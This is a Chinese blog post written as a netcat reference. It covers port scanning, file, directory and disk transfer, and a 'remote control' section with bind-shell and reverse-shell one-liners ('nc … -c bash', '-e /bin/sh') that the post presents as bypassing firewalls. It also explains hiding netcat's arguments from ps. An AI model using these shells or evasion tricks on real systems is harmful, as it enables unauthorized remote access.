神器netcat使用字典

目录

  • 基础使用
    • 单向侦听
    • 双向聊天
    • 日常习惯
  • 拓展使用
    • 正/反向域名解析
    • 传输⽂件/目录;加密传输
    • 端口扫描,获取banner信息
    • 远程克隆硬盘
    • 远控

基础使用

1.最简单的单向使用

使用:B(客户端) ”nc 主机名/IP 端口号/服务名"
前提:A主机打开了端口(任何对外服务的端口),B主机使用nc命令连接。
示例:

  • nmap查看到172.16.70.140开了22端口,通常这是sshd的服务端口,nc上去看看(结果不一定准确):

nc 172.16.70.140 22
SSH-2.0-OpenSSH_4.3

  • 使用主机名也可以,这次我们加一个 -v 参数:

nc -v g.cn 80
Connection to g.cn 80 port [tcp/http] succeeded!

  • 端口号可以不用数字,用 /etc/services 里面的服务名来代替知名端口号,不是所有的系统自带nc都支持:

nc dev3-140 ssh
SSH-2.0-OpenSSH_4.3

2.简单双向使用(chat)

A服务端:nc -lp 端口号
B客户端:nc -nv Aip A端口号
实现双向文本传输

3.隐藏命令行参数(培养日常使用习惯)

如果没有提供命令行参数,NetCat会提示你从标准输入来输入命令参数,然后NetCat会在内部解析输入。用这种办法输入命令式参数,可以用来防止借助“ps”来查看你的命令行参数。示例:

  • nc
    Cmd line: -l 1234

此时我们在系统上用ps命令查看nc的进程,是看不到nc的参数的。如果我们直接在命令行写上参数,ps就能看到命令行参数了。

  • nc -l 1234
    // 上面命令我们一般能用ps命令查看到类似下面的信息。
  • ps aux|grep nc
    root 7332 0.0 0.0 1772 536 pts/4 S+ 10:38 0:00 nc -l 1234

拓展使用

1.正/反向域名解析

主机参数可以是一个名字或一个IP地址。

  • -n,接受IP地址,不再对计算机的名字或域名进行解析。
  • 没有-n,加上-v,NetCat可进行正/反向域名解析,并警告the all-too-common problem of mismatched name in DNS。这会耗费稍多一点时间,但在某些情况下会有用处。如,你想知道某个IP的主机名,NetCat可省却你手工查找的时间。
  • A机器使用参数运行nc:

/data/bin/nc -l 1234
...
B机器连接:
nc -v dev3-168 1234
Connection to dev3-168 1234 port [tcp/search-agent] succeeded!
...
接着在B机器输入任何字符串并按Enter键,甲机器都能收到。

上面dev3-168是我的域中一个机器名,-v参数和-n参数都对主机名解析。都是-v参数可以通过ip反向解析出主机名。示例:

  • nc -v 172.16.70.140 1234
    dev3-140.dev.cn.tlan [172.16.70.140] 1234 (?) open

2.传输⽂件/目录

  • 传输单个⽂件

A:nc -lp 333 > 1.mp4
B:nc -nv 1.1.1.1 333 < 1.mp4 –q 1

或反向:

A:nc -q 1 -lp 333 < a.mp4
B: nc -nv 1.1.1.1 333 > 2.mp4

  • 传输目录(多个文件)
    原理:输出端打包压缩包传输,输入端解包。

A:tar -cvf - dir_name | nc -lp 333 –q 1
B:nc -nv 1.1.1.1 333 | tar -xvf –

或使用bzip2或者其他工具压缩

A:tar -cvf – dir_name | bzip2 -z | nc -l 1567
B:nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf -

  • 加密传⽂件

A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > file.txt
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

或:

A:nc localhost 333 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
B:mcrypt –flush –bare -F -q -m ecb < file.txt | nc -lp 333

3.端口扫描

nc -nvz 1.1.1.1 1-65535

nc –vnzu 1.1.1.1 1-1024

默认是TCP模式,-u参数调整为udp.
z 参数告诉netcat使用0 IO,连接成功后立即关闭连接, 不进行数据交换
v 参数指使用冗余选项(即详细输出)
n 参数告诉netcat 不要使用DNS反向查询IP地址的域名

命令会打印21到25 所有开放的端口。Banner是一个文本,Banner是一个你连接的服务发送给你的文本信息。可作为基础扫描,Banner信息可被修改,结果不一定准确。

4.远程克隆硬盘

A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1

dd是一个从磁盘读取原始数据的工具,我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。

5.远控(弹出shell)

正向:

A:nc -lp 333 -c bash
B:nc 1.1.1.1 333

反向(绕过防火墙):

A:nc -lp 333
B:nc 1.1.1.1 333 -c bash

• 注:Windows⽤户把bash改成cmd;

6.补充说明

Nc缺乏加密和⾝份验证的能⼒
Ncat包含于nmap⼯具包中

A:ncat ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
B:ncat -nv 1.1.1.1 333 --ssl

7.个别参数详解

  • v显示详细连接信息
    -v 参数可以将一些关于连接建立信息输出到标准错误。-v参数多出现几次,则显示的信息会更多一些。如果-v参数没有出现,则NetCat将默默地工作,至到出现错误为止。

  • w设定建立链接时间
    -w num
    [root@dev3-140 opt]# nc -vvv g.cn 80 -w 1 //1秒后断开连接
    Connection to g.cn 80 port [tcp/http] succeeded!
    [root@dev3-140 opt]# nc -vvv g.cn 80 -w 2 //2秒
    Connection to g.cn 80 port [tcp/http] succeeded!

  • p绑定端口
    " -p 端口 " 来绑定本地端口。除了因权限限制或端口已经使用外,-p可以绑定任何端口。Root用户可以绑定保留的1024以内的端口。如果不用-p指定端口,则使用系统给定的未使用的端口。

  • l作为服务器
    -l 参数可以使NetCat以服务器状态运行,即侦听模式。
    nc -l -p 1234 [remote hostname] [remote port] 可以用来指定入连的主机和端口,如果申请连接的主机或端口不符指定,则会断开连接。

A(1.1.1.1):nc -l -p 333 1.1.1.2 33
B(1.1.1.2):nc 1.1.1.1 333 -p 33

  • e执行指定程序
    -e 参数后面跟一可执行程序的名称,当一个连接(入或出)被建立时,这个程序被运行。需要说明的是,-e后的程序不能从NetCat的命令行接收参数,如果有参数要传递,可能需要一个脚本。通常linux的发行版是不带这个参数支持的,可以自己编译,编译时置-DGAPING_SECURITY_HOLE,则-e参数被NetCat支持。

A: nc
Cmd line: -l -p 333 1.1.1.2 33 -e /bin/sh
B:nc 1.1.1.1 -p 33
ls ---> 这是传递给1.1.1.1上/bin/sh的指令

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 158,736评论 4 362
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,167评论 1 291
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,442评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,902评论 0 204
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,302评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,573评论 1 216
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,847评论 2 312
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,562评论 0 197
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,260评论 1 241
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,531评论 2 245
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,021评论 1 258
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,367评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,016评论 3 235
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,068评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,827评论 0 194
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,610评论 2 274
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,514评论 2 269

推荐阅读更多精彩内容

  • Netcat是什么 NC(netcat)被称为网络工具中的瑞士军刀,体积小巧,但功能强大。 Nc主要功能 Nc可以...
    RedTeamWing阅读 42,743评论 2 7
  • linux资料总章2.1 1.0写的不好抱歉 但是2.0已经改了很多 但是错误还是无法避免 以后资料会慢慢更新 大...
    数据革命阅读 12,016评论 2 34
  • Netcat(Linux下NC命令)主要用途: 1.扫描制定ip端口情况。 2.端口监听,端口转发。 3.提交自定...
    kevinhuangk阅读 515评论 0 0
  • 好多天没见了,有点想念 因为单位的事,停了几天笔。这次试着用了下炭笔,还不大会用,亲们能给我留言指导是最好啦。 我...
    阿拉斯加海湾0阅读 223评论 2 4
  • 清明,雨,不变的冷和时晴 整晚在往耳朵里灌小虎队,青春的感觉一下充斥满屏,欲罢不能。自从决心考试,周末没了...
    沙展独酌阅读 219评论 0 0